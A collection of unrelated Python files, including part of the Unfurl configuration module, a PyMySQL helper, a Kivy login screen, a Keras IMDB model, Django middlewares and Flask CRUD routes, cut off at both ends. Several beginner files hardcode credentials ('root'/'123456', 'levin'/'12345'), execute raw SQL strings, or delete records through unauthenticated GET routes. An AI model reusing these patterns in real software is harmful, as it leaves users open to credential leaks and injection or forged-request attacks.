self.workingDirs[localRepoPath] = RepoView(dict(name="", url=gitUrl), newRepo)
return newRepo
class LocalConfig(object):
"""
Represents the local configuration file, which provides the environment that manifests run in, including:
instances imported from other ensembles, inputs, environment variables, secrets and local configuration.
It consists of:
* a list of ensemble manifests with their local configuration
* the default local and secret instances"""
# don't merge the value of the keys of these dicts:
replaceKeys = [
"inputs",
"attributes",
"schemas",
"connections",
"manifest",
"environment",
]
def __init__(self, path=None, parentConfig=None, validate=True):
defaultConfig = {"apiVersion": "unfurl/v1alpha1", "kind": "Project"}
self.config = YamlConfig(
defaultConfig, path, validate, os.path.join(_basepath, "unfurl-schema.json")
)
self.manifests = self.config.expanded.get("manifests") or []
self.projects = self.config.expanded.get("projects") or {}
contexts = self.config.expanded.get("contexts", {})
if parentConfig:
parentContexts = parentConfig.config.expanded.get("contexts", {})
contexts = mergeDicts(
parentContexts, contexts, replaceKeys=self.replaceKeys
)
self.contexts = contexts
self.parentConfig = parentConfig
self.localRepositories = self.config.expanded.get("localRepositories") or {}
def getContext(self, manifestPath, context):
localContext = self.contexts.get("defaults") or {}
contextName = "defaults"
for spec in self.manifests:
if manifestPath == self.adjustPath(spec["file"]):
# use the context associated with the given manifest
contextName = spec.get("context", contextName)
break
if contextName != "defaults" and self.contexts.get(contextName):
localContext = mergeDicts(
localContext, self.contexts[contextName], replaceKeys=self.replaceKeys
)
return mergeDicts(context, localContext, replaceKeys=self.replaceKeys)
def adjustPath(self, path):
"""
Makes sure relative paths are relative to the location of this local config
"""
return os.path.join(self.config.getBaseDir(), path)
def getDefaultManifestPath(self):
if len(self.manifests) == 1:
return self.adjustPath(self.manifests[0]["file"])
else:
for spec in self.manifests:
if spec.get("default"):
return self.adjustPath(spec["file"])
return None
def createLocalInstance(self, localName, attributes):
# local or secret
from .runtime import NodeInstance
if "default" in attributes:
if not "default" in attributes.get(".interfaces", {}):
attributes.setdefault(".interfaces", {})[
"default"
] = "unfurl.support.DelegateAttributes"
if "inheritFrom" in attributes:
if not "inherit" in attributes.get(".interfaces", {}):
attributes.setdefault(".interfaces", {})[
"inherit"
] = "unfurl.support.DelegateAttributes"
instance = NodeInstance(localName, attributes)
instance._baseDir = self.config.getBaseDir()
return instance
def registerProject(self, project):
# update, if necessary, localRepositories and projects
key, local = self.config.searchIncludes(key="localRepositories")
if not key and "localRepositories" not in self.config.config:
# localRepositories doesn't exist, see if we are including a file inside "local"
pathPrefix = os.path.join(self.config.getBaseDir(), "local")
key, local = self.config.searchIncludes(pathPrefix=pathPrefix)
if not key:
local = self.config.config
repo = project.projectRepo
localRepositories = local.setdefault("localRepositories", {})
lock = repo.asRepoView().lock()
if localRepositories.get(repo.workingDir) != lock:
localRepositories[repo.workingDir] = lock
else:
return False # no change
if not repo.isLocalOnly():
for name, val in self.projects.items():
if normalizeGitUrl(val["url"]) == normalizeGitUrl(repo.url):
break
else:
# if project isn't already in projects, use generated name
# XXX need to replace characters that don't match our namedObjects pattern manifest-schema.json
dirname, name = os.path.split(project.projectRoot)
if name == DefaultNames.ProjectDirectory:
name = os.path.basename(dirname)
counter = 0
while name in self.projects:
counter += 1
name += "-%s" % counter
externalProject = dict(
url=repo.url,
initial=repo.getInitialRevision(),
)
file = os.path.relpath(project.projectRoot, repo.workingDir)
if file and file != ".":
externalProject["file"] = file
self.projects[name] = externalProject
self.config.config.setdefault("projects", {})[name] = externalProject
if key:
self.config.saveInclude(key)
self.config.save()
return True
class LocalEnv(object):
"""
This class represents the local environment that an ensemble runs in, including
the local project it is part of and the home project.
"""
homeProject = None
def __init__(self, manifestPath=None, homePath=None, parent=None, project=None):
"""
If manifestPath is None find the first unfurl.yaml or ensemble.yaml
starting from the current directory.
If homepath is set it overrides UNFURL_HOME
        (and an empty string disables the home path).
Otherwise the home path will be set to UNFURL_HOME or the default home location.
"""
import logging
logger = logging.getLogger("unfurl")
self.logger = logger
if parent:
self._projects = parent._projects
self._manifests = parent._manifests
self.homeConfigPath = parent.homeConfigPath
else:
self._projects = {}
if project:
self._projects[project.localConfig.config.path] = project
self._manifests = {}
self.homeConfigPath = getHomeConfigPath(homePath)
if self.homeConfigPath:
if not os.path.exists(self.homeConfigPath):
logger.warning(
'UNFURL_HOME is set but does not exist: "%s"', self.homeConfigPath
)
else:
self.homeProject = self.getProject(self.homeConfigPath, None)
if not self.homeProject:
logger.warning(
'Could not load home project at: "%s"', self.homeConfigPath
)
self.manifestPath = None
if manifestPath:
# if manifestPath does not exist check project config
manifestPath = os.path.abspath(manifestPath)
if not os.path.exists(manifestPath):
# XXX check if the manifest is named in the project config
# pathORproject = self.findProject(os.path.dirname(manifestPath))
# if pathORproject:
# self.manifestPath = pathORproject.getInstance(manifestPath)
# else:
raise UnfurlError(
"Ensemble manifest does not exist: '%s'" % manifestPath
)
else:
pathORproject = self.findManifestPath(manifestPath)
else:
# not specified: search current directory and parents for either a manifest or a project
pathORproject = self.searchForManifestOrProject(".")
if isinstance(pathORproject, Project):
self.project = pathORproject
if not self.manifestPath:
self.manifestPath = pathORproject.findDefaultInstanceManifest()
else:
self.manifestPath = pathORproject
if project:
self.project = project
else:
self.project = self.findProject(os.path.dirname(pathORproject))
self.toolVersions = {}
self.instanceRepo = self._getInstanceRepo()
self.config = (
self.project
and self.project.localConfig
or self.homeProject
and self.homeProject.localConfig
or LocalConfig()
)
def getVaultPassword(self, vaultId="default"):
secret = os.getenv("UNFURL_VAULT_%s_PASSWORD" % vaultId.upper())
if not secret:
context = self.getContext()
secret = (
context.get("secrets", {})
.get("attributes", {})
.get("vault_%s_password" % vaultId)
)
return secret
def getManifest(self, path=None):
from .yamlmanifest import YamlManifest
if path and path != self.manifestPath:
# share projects and ensembles
localEnv = LocalEnv(path, parent=self)
return localEnv.getManifest()
else:
manifest = self._manifests.get(self.manifestPath)
if not manifest:
vaultId = "default"
vault = makeVaultLib(self.getVaultPassword(vaultId), vaultId)
if vault:
self.logger.info(
"Vault password found, configuring vault id: %s", vaultId
)
manifest = YamlManifest(localEnv=self, vault=vault)
self._manifests[self.manifestPath] = manifest
return manifest
def getProject(self, path, homeProject):
path = Project.normalizePath(path)
project = self._projects.get(path)
if not project:
project = Project(path, homeProject)
self._projects[path] = project
return project
def getExternalManifest(self, location):
assert "project" in location
project = None
if self.project:
project = self.project.localConfig.projects.get(location["project"])
if not project and self.homeProject:
project = self.homeProject.localConfig.projects.get(location["project"])
if not project:
return None
repo = self.findGitRepo(project["url"])
if not repo:
return None
projectRoot = os.path.join(repo.workingDir, project.get("file") or "")
localEnv = LocalEnv(
os.path.join(projectRoot, location.get("file") or ""), parent=self
)
return localEnv.getManifest()
# manifestPath specified
# doesn't exist: error
# is a directory: either instance repo or a project
def findManifestPath(self, manifestPath):
if not os.path.exists(manifestPath):
raise UnfurlError(
"Manifest file does not exist: '%s'" % os.path.abspath(manifestPath)
)
if os.path.isdir(manifestPath):
test = os.path.join(manifestPath, DefaultNames.Ensemble)
if os.path.exists(test):
return test
else:
test = os.path.join(manifestPath, DefaultNames.LocalConfig)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
else:
test = os.path.join(manifestPath, DefaultNames.ProjectDirectory)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
else:
message = (
"Can't find an Unfurl ensemble or project in folder '%s'"
% manifestPath
)
raise UnfurlError(message)
else:
return manifestPath
def _getInstanceRepo(self):
instanceDir = os.path.dirname(self.manifestPath)
if self.project and instanceDir in self.project.workingDirs:
return self.project.workingDirs[instanceDir].repo
else:
return Repo.findContainingRepo(instanceDir)
def getRepos(self):
if self.project:
repos = self.project.getRepos()
else:
repos = []
if self.instanceRepo and self.instanceRepo not in repos:
return repos + [self.instanceRepo]
else:
return repos
def searchForManifestOrProject(self, dir):
current = os.path.abspath(dir)
while current and current != os.sep:
test = os.path.join(current, DefaultNames.Ensemble)
if os.path.exists(test):
return test
test = os.path.join(current, DefaultNames.LocalConfig)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
test = os.path.join(current, DefaultNames.ProjectDirectory)
if os.path.exists(test):
return self.getProject(test, self.homeProject)
current = os.path.dirname(current)
message = "Can't find an Unfurl ensemble or project in the current directory (or any of the parent directories)"
raise UnfurlError(message)
def findProject(self, testPath):
"""
Walk parents looking for unfurl.yaml
"""
path = Project.findPath(testPath)
if path is not None:
return self.getProject(path, self.homeProject)
return None
def getContext(self, context=None):
"""
Return a new context that merges the given context with the local context.
"""
return self.config.getContext(self.manifestPath, context or {})
def getRuntime(self):
context = self.getContext()
runtime = context.get("runtime")
if runtime:
return runtime
if self.project and self.project.venv:
return "venv:" + self.project.venv
if self.homeProject and self.homeProject.venv:
return "venv:" + self.homeProject.venv
return None
def getLocalInstance(self, name, context):
assert name in ["locals", "secrets", "local", "secret"]
local = context.get(name, {})
return (
self.config.createLocalInstance(
name.rstrip("s"), local.get("attributes", {})
),
local,
)
def findGitRepo(self, repoURL, revision=None):
repo = None
if self.project:
repo = self.project.findGitRepo(repoURL, revision)
if not repo:
if self.homeProject:
return self.homeProject.findGitRepo(repoURL, revision)
return repo
def findOrCreateWorkingDir(self, repoURL, revision=None, basepath=None):
repo = self.findGitRepo(repoURL, revision)
# git-local repos must already exist
if not repo and not repoURL.startswith("git-local://"):
if self.project and (
basepath is None or self.project.isPathInProject(basepath)
):
project = self.project
else:
project = self.homeProject
if project:
repo = project.createWorkingDir(repoURL, revision)
if not repo:
return None, None, None
if revision:
# bare if HEAD isn't at the requested revision
bare = repo.revision != repo.resolveRevSpec(revision)
return repo, repo.revision, bare
else:
return repo, repo.revision, False
def findPathInRepos(self, path, importLoader=None):
"""If the given path is part of the working directory of a git repository
return that repository and a path relative to it"""
# importloader is unused until pinned revisions are supported
if self.instanceRepo:
repo = self.instanceRepo
filePath = repo.findRepoPath(path)
if filePath is not None:
return repo, filePath, repo.revision, False
candidate = None
repo = None
if self.project:
repo, filePath, revision, bare = self.project.findPathInRepos(
path, importLoader
)
if repo:
if not bare:
return repo, filePath, revision, bare
else:
candidate = (repo, filePath, revision, bare)
if self.homeProject:
repo, filePath, revision, bare = self.homeProject.findPathInRepos(
path, importLoader
)
if repo:
if bare and candidate:
return candidate
else:
return repo, filePath, revision, bare
return None, None, None, None
def mapValue(self, val):
"""
Evaluate using project home as a base dir.
"""
from .runtime import NodeInstance
from .eval import mapValue
instance = NodeInstance()
instance._baseDir = self.config.config.getBaseDir()
return mapValue(val, instance)
def getPaths(self):
paths = []
asdfDataDir = os.getenv("ASDF_DATA_DIR")
if not asdfDataDir:
# check if an ensemble previously installed asdf via git
repo = self.findGitRepo("https://github.com/asdf-vm/asdf.git/")
if repo:
asdfDataDir = repo.workingDir
else:
homeAsdf = os.path.expanduser("~/.asdf")
if os.path.isdir(homeAsdf):
asdfDataDir = homeAsdf
if asdfDataDir:
# project has higher priority over home project
if self.project:
paths = self.project.getAsdfPaths(asdfDataDir, self.toolVersions)
if self.homeProject:
paths += self.homeProject.getAsdfPaths(asdfDataDir, self.toolVersions)
return paths
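# Illustrative sketch only (not part of the original module): resolve the local
# environment for a hypothetical ensemble file and print its merged context.
# "ensemble.yaml" is an assumed path and must exist for this to run.
if __name__ == "__main__":
    env = LocalEnv("ensemble.yaml")
    print(env.getContext())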
|
# -*- coding: utf-8 -*-
import importlib.util
spec = importlib.util.spec_from_file_location("piepompt.part", "/home/markl/.config/pieprompt/hipart.py")
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
|
import numpy as np
import cv2
from scipy.ndimage.filters import convolve
from scipy.spatial.distance import cdist
from cv2.ximgproc import guidedFilter
def Guided(I, p, r, eps):
return guidedFilter(I, p, r, eps)
def GuidedOptimize(G, P, r, eps):
N = len(G)
W = []
for i in range(N):
# MOST COSTLY OPERATION IN THE WHOLE THING
W.append(Guided(G[i].astype(np.float32), P[i].astype(np.float32), r, eps))
W = np.dstack(W) + 1e-12
W = W / W.sum(axis=2, keepdims=True)
return W
def SalWeights(G):
N = len(G)
W = []
for i in range(N):
W.append(saliency(G[i]))
W = np.dstack(W) + 1e-12
W = W / W.sum(axis=2, keepdims=True)
return W
D = cdist(np.arange(256)[:,None], np.arange(256)[:,None], 'euclidean')
def saliency(img):
global D
hist = np.bincount(img.flatten(), minlength=256) / img.size
sal_tab = np.dot(hist, D)
z = sal_tab[img]
return z
def FuseWeights(G, W):
return np.sum(np.dstack(G)*W, axis=2)
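# Illustrative usage sketch (file names and parameter values are hypothetical):
# fuse two grayscale exposures using saliency weights refined by the guided filter.
if __name__ == "__main__":
    imgs = [cv2.imread(p, cv2.IMREAD_GRAYSCALE) for p in ("under.png", "over.png")]
    sal = [saliency(im) for im in imgs]            # per-image saliency maps
    W = GuidedOptimize(imgs, sal, r=8, eps=0.1)    # refine and normalize the weight maps
    fused = FuseWeights(imgs, W)                   # weighted sum across the image stack
    cv2.imwrite("fused.png", fused.astype(np.uint8))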
|
import pymysql
from logger import Logger
class PyMQLHelper:
"""
    PyMySQL helper class
"""
    def __init__(self, db_address: str, db_username: str, db_password: str, db_name: str):
        self.__logger = Logger()
        """Logger object"""
        self.__connection = None
        try:
            # keyword arguments keep this working across PyMySQL versions
            self.__connection = pymysql.connect(host=db_address,
                                                user=db_username,
                                                password=db_password,
                                                database=db_name)
        except Exception as e:
            self.__logger.debug(e)
def create_table(self, sql: str):
"""
创建数据表
关键词 with 语句可以保证诸如文件之类的对象在使用完之后一定会正确的执行其清理方法
:param sql 创建数据表的SQL语句
:type sql str
"""
if self.__connection is None:
return
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
except Exception as e:
self.__logger.debug(e)
finally:
self.__connection.close()
def execute_operation(self, sql: str):
"""
插入、删除、更新数据
:param sql 插入、删除、更新SQL语句
:type sql str
:return true 操作成功;false 操作失败
"""
if self.__connection is None:
return False
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
count = cursor.rowcount
self.__connection.commit()
if count == 1:
return True
else:
return False
except Exception as e:
self.__connection.rollback()
self.__logger.debug(e)
finally:
self.__connection.close()
def get_all(self, sql: str):
"""
获取符合条件的全部数据
:param sql 查询SQL语句
:type sql str
"""
if self.__connection is None:
return None
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
                # fetch the full list of matching records
results = cursor.fetchall()
return results
except Exception as e:
self.__logger.debug(e)
finally:
self.__connection.close()
def get_one(self, sql: str):
"""
获取符合条件的一条数据
:param sql 查询SQL语句
:type sql str
"""
if self.__connection is None:
return None
try:
with self.__connection.cursor() as cursor:
cursor.execute(sql)
                # fetch a single record
result = cursor.fetchone()
return result
except Exception as e:
self.__logger.debug(e)
finally:
self.__connection.close()
if __name__ == '__main__':
helper = PyMQLHelper('localhost', 'root', '123456', 'pythontest')
helper.get_all('SELECT * FROM employee')
|
# -*- coding: utf-8 -*-
import itertools
from typing import List
class Solution:
def runningSum(self, nums: List[int]) -> List[int]:
return list(itertools.accumulate(nums))
if __name__ == "__main__":
solution = Solution()
assert [1, 3, 6, 10] == solution.runningSum([1, 2, 3, 4])
assert [1, 2, 3, 4, 5] == solution.runningSum([1, 1, 1, 1, 1])
assert [3, 4, 6, 16, 17] == solution.runningSum([3, 1, 2, 10, 1])
|
#!/usr/bin/python3
name = input("hello please input your name:")
print("hello",":"+name)
|
from time import sleep
def rowinput(row): # Inputting rows. Invoked in sudinput().
    try:
        rowlist = [int(i) for i in str(row)]
        assert len(rowlist) == 9
        return rowlist
    except (ValueError, AssertionError):
        return rowinput(input("Invalid input. Try again: "))
def sudinput(): # Creation of 9 rows and a matrix
global row1, row2, row3, row4, row5, row6, row7, row8, row9, megarow
row1 = rowinput(input("Enter row 1: "))
row2 = rowinput(input("Enter row 2: "))
row3 = rowinput(input("Enter row 3: "))
row4 = rowinput(input("Enter row 4: "))
row5 = rowinput(input("Enter row 5: "))
row6 = rowinput(input("Enter row 6: "))
row7 = rowinput(input("Enter row 7: "))
row8 = rowinput(input("Enter row 8: "))
row9 = rowinput(input("Enter row 9: "))
megarow = [row1, row2, row3, row4, row5, row6, row7, row8, row9]
def checkrows(row): # Checking a row
for i in range(1,10):
if i not in row:
return False
return True
def checkcols(): #Checking columns
column = []
for i in range(9):
for row in megarow:
column.append(row[i])
for i in range(1,10):
if i not in column:
return False
column = []
return True
def checksqrs(): #Checking squares
sqr1 = row1[:3] + row2[:3] + row3[:3]
sqr2 = row1[3:6] + row2[3:6] + row3[3:6]
sqr3 = row1[6:] + row2[6:] + row3[6:]
sqr4 = row4[:3] + row5[:3] + row6[:3]
sqr5 = row4[3:6] + row5[3:6] + row6[3:6]
sqr6 = row4[6:] + row5[6:] + row6[6:]
sqr7 = row7[:3] + row8[:3] + row9[:3]
sqr8 = row7[3:6] + row8[3:6] + row9[3:6]
sqr9 = row7[6:] + row8[6:] + row9[6:]
megalist = [sqr1, sqr2, sqr3, sqr4, sqr5, sqr6, sqr7, sqr8, sqr9]
for sqr in megalist:
for i in range(1, 10):
if i not in sqr:
return False
return True
###########Start of the actual script###########
sudinput()
for row in megarow:
if checkrows(row) == False:
row_check = False
break
row_check = True
col_check = checkcols()
sqr_check = checksqrs()
if row_check == True and col_check == True and sqr_check == True:
print("Yes")
else:
print("No")
if row_check == False:
print("Row check failed.")
if col_check == False:
print("Column check failed.")
if sqr_check == False:
print("Square check failed.")
close = input("Press any key to exit.")
|
#!/usr/bin/python
import sys
import codecs
from pyarmory import char
# usage
if len(sys.argv) < 3:
print sys.argv[0] + " [zone] [realm] [character name]"
print
print "Example: " + sys.argv[0] + " eu Zuluhed Ixell"
exit()
# open output file rep.<region>.<realm>.<char>.py
filename = "rep." + sys.argv[1] + "." + sys.argv[2] + "." + sys.argv[3] + ".py"
f = codecs.open(filename, encoding='utf-8', mode='w')
f.write("# faction, score, level\n")
f.write("rep = {\n")
reps = char.getReputation(sys.argv[1], sys.argv[2], sys.argv[3])
for k,v in reps.items():
f.write("\"" + k + "\": " + v.__str__() + ",\n")
f.write("}\n")
|
#Enhancement: contrast-limited adaptive histogram equalization (CLAHE)
import cv2
img = cv2.imread('sal.png')
t = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))  # typical default-style parameters
t = clahe.apply(t)  # apply the equalization to the grayscale image
cv2.imshow('save.png', t)
if cv2.waitKey(0) & 0xFF == ord('q'):
    cv2.destroyAllWindows()
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class AnmeldenWindow(BoxLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def validate_user(self):
user = self.ids.username_field
pwd = self.ids.pwd_field
info = self.ids.info
uname = user.text
passw = pwd.text
if uname == '' or passw == '':
info.text = '[color=#FF0000]Benutzername und/oder Passwort benötigt.[/color]'
else:
if uname == 'levin' and passw == '12345':
info.text = '[color=#00FF00]Erfolgreich eingeloggt.[/color]'
else:
info.text = '[color=#FF0000]Benutzername und/oder Passwort ungültig.[/color]'
class AnmeldenApp(App):
def build(self):
return AnmeldenWindow()
if __name__=="__main__":
sa = AnmeldenApp()
sa.run()
|
#Write a Python program to convert temperatures to and from celsius, fahrenheit.
#[ Formula : c/5 = (f-32)/9, where c = temperature in celsius and f = temperature in fahrenheit ]
#Expected Output :
#60°C is 140 in Fahrenheit
#45°F is 7 in Celsius
c = 60
f = 32 + 9 * c / 5
print("%d°C is %d in Fahrenheit" % (c, f))
f = 45
c = 5 * (f - 32) / 9
print("%d°F is %d in Celsius" % (f, c))
|
from django.conf.urls import url, include
from django.urls import path
from rest_framework.routers import DefaultRouter
from .views import FileUploadAPIView, FileUploadOldVersionAPIView
urlpatterns = [
    # -- General description
path('api/isu_v1/upload/csv/', FileUploadOldVersionAPIView.as_view()),
]
|
import time
import numpy as np
import matplotlib.pyplot as plt
import scipy
import predictionData
import functions
test_x = predictionData.inputData[:, 4000:4600]
test_y = predictionData.outputData[:, 4000:4600]
print(np.shape(test_y))
initial_val = test_x[:, 1]
def MovingAverage(inputArray):
#weights = np.array([1.0/21, 2.0/21, 3.0/21, 4.0/21, 5.0/21, 6.0/21])
#inputArray = np.multiply(inputArray, weights)
return np.average(inputArray)
predict_y = []
inputArray = initial_val
print(inputArray)
for i in range(0, np.shape(test_x)[1]):
print(inputArray)
y = MovingAverage(test_x[:, i:i+1])
#inputArray = np.append(inputArray[1:], y)
predict_y.append(y)
cost = functions.compute_cost(predict_y, test_y)
averageError = functions.averageError(predict_y, test_y)
print(cost)
print(averageError)
|
import os
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import numpy as np
from keras.models import Sequential
from keras.layers import Embedding, Flatten, Dense, LSTM, Dropout
from keras import layers
import pickle
from myUtility import preprocessImdb
maxlen = 500  # We will cut reviews after 500 words
training_samples = 20000  # We will be training on 20,000 samples
validation_samples = 5000  # We will be validating on 5,000 samples
max_words = 10000  # We will only consider the top 10,000 words in the dataset
#loading data and preproccing
imdb_dir = r'C:\Users\Osama\Downloads\DL Workspace\Data\aclImdb'
train_dir = os.path.join(imdb_dir, 'train')
word_index, x_train, y_train, x_val, y_val= preprocessImdb(train_dir, max_words, maxlen, IsValidationDataNeeded=True, trainingSamplesNo=training_samples, ValidationSamplesNo=validation_samples)
#import csv
#i=0
#with open('train.csv','w') as file:
# for text,label in zip(texts,labels):
# try:
# mylist=[]
# mylist.append(str(i))
# mylist.append(str(label))
# mylist.append('a')
# mylist.append(text)
#
# wr = csv.writer(file, quoting=csv.QUOTE_ALL)
# wr.writerow(mylist)
# i=i+1
# #print(text)
# except:
# continue
#
"""
import numpy as np
np.savetxt('x_train.txt', x_train)
np.savetxt('y_train.txt', y_train)
np.savetxt('x_val.txt', x_val)
np.savetxt('y_val.txt', y_val)
import numpy as np
x_train=np.loadtxt('/content/drive/My Drive/app/x_train.txt')
y_train=np.loadtxt('/content/drive/My Drive/app/y_train.txt')
x_val=np.loadtxt('/content/drive/My Drive/app/x_val.txt')
y_val=np.loadtxt('/content/drive/My Drive/app/y_val.txt')
"""
glove_dir = r'C:\Users\Osama\Downloads\DL Workspace\models'
embeddings_index = {}
f = open(os.path.join(glove_dir, 'glove.6B.300d.txt'), encoding="utf8")
for line in f:
try:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
except:
continue
f.close()
print('Found %s word vectors.' % len(embeddings_index))
embedding_dim = 300
embedding_matrix = np.zeros((max_words, embedding_dim))
for word, i in word_index.items():
embedding_vector = embeddings_index.get(word)
if i < max_words:
if embedding_vector is not None:
# Words not found in embedding index will be all-zeros.
embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(max_words, embedding_dim, input_length=maxlen))
model.add(layers.Conv1D(32, 7, activation='relu'))
model.add(layers.MaxPooling1D(5))
model.add(layers.Conv1D(32, 7, activation='relu'))
model.add(layers.GlobalMaxPooling1D())
#model.add(LSTM(128, dropout=0.2, recurrent_dropout=0.2))
#model.add(Dropout(0.5))
model.add(Dense(1, activation='sigmoid'))
model.summary()
model.layers[0].set_weights([embedding_matrix])
#model.layers[0].trainable = False
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
history = model.fit(x_train, y_train,
epochs=4,
batch_size=128,
validation_data=(x_val, y_val))
model.save_weights('modelWeights.h5')
model.save('model.h5')
from myUtility import plotResults
plotResults(history)
test_dir = os.path.join(imdb_dir, 'test')
word_index, x_test, y_test= preprocessImdb(test_dir, max_words, maxlen)
#model.load_weights('modelWeights.h5')
model.evaluate(x_test, y_test)
#from keras.models import load_model
#myModel=load_model('preTrainedModel.h5')
#myModel.evaluate(x_test, y_test)
|
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
        # The obvious approach is to reverse both lists, but the problem statement
        # says the input must not be modified, so instead push the digits onto two
        # stacks and add them from the least significant end.
stack_1 = []
stack_2 = []
# put all numbers into stack from list 1
        curr_1, curr_2 = l1, l2
        while curr_1 and curr_2:
            stack_1.append(curr_1.val)
            stack_2.append(curr_2.val)
            curr_1 = curr_1.next
            curr_2 = curr_2.next
        # add remaining node values to the stacks, advancing the pointers
        while curr_1:
            stack_1.append(curr_1.val)
            curr_1 = curr_1.next
        while curr_2:
            stack_2.append(curr_2.val)
            curr_2 = curr_2.next
power = 0
result = 0
while stack_1 and stack_2:
# pop the top of the stack
num_1 = stack_1.pop()
num_2 = stack_2.pop()
result += (num_1*(10**power) + num_2*(10**power))
# increment the power(of 10)
power += 1
if stack_1:
while stack_1:
num = stack_1.pop()
result += num*(10**power)
power += 1
if stack_2:
while stack_2:
num = stack_2.pop()
result += num*(10**power)
power += 1
result = str(result)
# build the linked list version of number
        head = curr = ListNode(int(result[0]))
        for i in range(1, len(result)):
            digit = int(result[i])
            new_node = ListNode(digit)
curr.next = new_node
curr = new_node
return head
# def length(self, head):
# """
# Find the length of the given linked list
# """
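# Illustrative check (not part of the original submission): 7243 + 564 = 7807,
# with each number stored most-significant digit first.
def _build(digits):
    head = curr = ListNode(digits[0])
    for d in digits[1:]:
        curr.next = ListNode(d)
        curr = curr.next
    return head
if __name__ == "__main__":
    result = Solution().addTwoNumbers(_build([7, 2, 4, 3]), _build([5, 6, 4]))
    digits = []
    while result:
        digits.append(result.val)
        result = result.next
    print(digits)  # expected: [7, 8, 0, 7]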
|
"""Core middlewares."""
from django import http
from django.urls import reverse
from django.utils.deprecation import MiddlewareMixin
from . import models
class LocalConfigMiddleware(MiddlewareMixin):
"""A middleware to inject LocalConfig into request."""
def process_request(self, request):
"""Inject LocalConfig instance to request."""
request.localconfig = models.LocalConfig.objects.first()
class TwoFAMiddleware:
"""Custom 2FA middleware to enforce verification if user has TFA enabled."""
def __init__(self, get_response=None):
self.get_response = get_response
def __call__(self, request):
user = getattr(request, "user", None)
redirect_url = reverse("core:2fa_verify")
url_exceptions = (
redirect_url,
"/jsi18n/"
)
condition = (
user and
not user.is_anonymous and
user.tfa_enabled and
not request.path.startswith('/api/') and
request.path not in url_exceptions and
not user.is_verified()
)
if condition:
            return http.HttpResponseRedirect(redirect_url)
return self.get_response(request)
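# Illustrative sketch only: the middlewares above would be enabled from the project
# settings. The dotted paths below assume this module lives at core/middleware.py.
# MIDDLEWARE = [
#     ...,
#     "core.middleware.LocalConfigMiddleware",
#     "core.middleware.TwoFAMiddleware",
# ]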
|
"""
Logic for dashboard related routes
"""
from flask import Blueprint, render_template,redirect,url_for,flash
from .forms import LogUserForm, secti,masoform,TestForm,HryForm,VyvojarForm
from ..data.database import db
from ..data.models import LogUser,Emaily,Hry,Vyvojari
blueprint = Blueprint('public', __name__)
@blueprint.route('/', methods=['GET'])
def index():
return render_template('public/index.tmpl')
@blueprint.route('/loguserinput',methods=['GET', 'POST'])
def InsertLogUser():
form = LogUserForm()
if form.validate_on_submit():
LogUser.create(**form.data)
return render_template("public/LogUser.tmpl", form=form)
@blueprint.route('/loguserlist',methods=['GET'])
def ListuserLog():
pole = db.session.query(LogUser).all()
return render_template("public/listuser.tmpl",data = pole)
@blueprint.route('/secti', methods=['GET','POST'])
def scitani():
form = secti()
if form.validate_on_submit():
return render_template('public/vystup.tmpl',hod1=form.hodnota1.data,hod2=form.hodnota2.data,suma=form.hodnota1.data+form.hodnota2.data)
return render_template('public/secti.tmpl', form=form)
@blueprint.route('/maso', methods=['GET','POST'])
def masof():
form = masoform()
if form.validate_on_submit():
return render_template('public/masovystup.tmpl',hod1=form.hodnota1.data,hod2=form.hodnota2.data,suma=form.hodnota1.data+form.hodnota2.data)
return render_template('public/maso.tmpl', form=form)
@blueprint.route('/testForm', methods=['GET','POST'])
def Formular():
form = TestForm()
if form.validate_on_submit():
Emaily.create(**form.data)
flash("Ulozeno",category="INFO")
return render_template('public/testForm.tmpl', form=form)
@blueprint.route('/testList', methods=['GET'])
def FormularList():
pole = db.session.query(Emaily).all()
return render_template('public/testList.tmpl', pole=pole)
@blueprint.route('/smazEmail/<id>', methods=['GET'])
def FormularDel(id):
iddel = db.session.query(Emaily).filter_by(id=id).first()
Emaily.delete(iddel)
return redirect(url_for('public.FormularList'))
@blueprint.route('/hry', methods=['GET','POST'])
def FormularHry():
form = HryForm()
if form.validate_on_submit():
Hry.create(**form.data)
flash("Ulozeno",category="INFO")
return render_template('public/hryForm.tmpl', form=form)
@blueprint.route('/hryList', methods=['GET'])
def FormularHryList():
pole = db.session.query(Hry).all()
return render_template('public/hryList.tmpl', pole=pole)
@blueprint.route('/smazHru/<id>', methods=['GET'])
def FormularHryDel(id):
hra = db.session.query(Hry).filter_by(id=id).first()
Hry.delete(hra)
return redirect(url_for('public.FormularHryList'))
@blueprint.route('/upravHru/<id>', methods=['GET','POST'])
def FormularHryEdit(id):
hra = db.session.query(Hry).filter_by(id=id).first()
form=HryForm(obj=hra)
if form.validate_on_submit():
Hry.delete(hra)
Hry.create(**form.data)
return redirect(url_for('public.FormularHryList'))
return render_template("public/hryForm.tmpl", action="Edit", form=form)
@blueprint.route('/vyvojari', methods=['GET','POST'])
def FormularVyvojari():
form = VyvojarForm()
if form.validate_on_submit():
Vyvojari.create(**form.data)
flash("Ulozeno",category="INFO")
return render_template('public/vyvojarForm.tmpl', form=form)
@blueprint.route('/vyvojariList', methods=['GET'])
def FormularVyvojariList():
pole = db.session.query(Vyvojari).all()
return render_template('public/vyvojariList.tmpl', pole=pole)
@blueprint.route('/smazVyvojare/<id>', methods=['GET'])
def FormularVyvojariDel(id):
vyvojar = db.session.query(Vyvojari).filter_by(id=id).first()
    Vyvojari.delete(vyvojar)
return redirect(url_for('public.FormularVyvojariList'))
@blueprint.route('/upravVyvojare/<id>', methods=['GET','POST'])
def FormularVyvojariEdit(id):
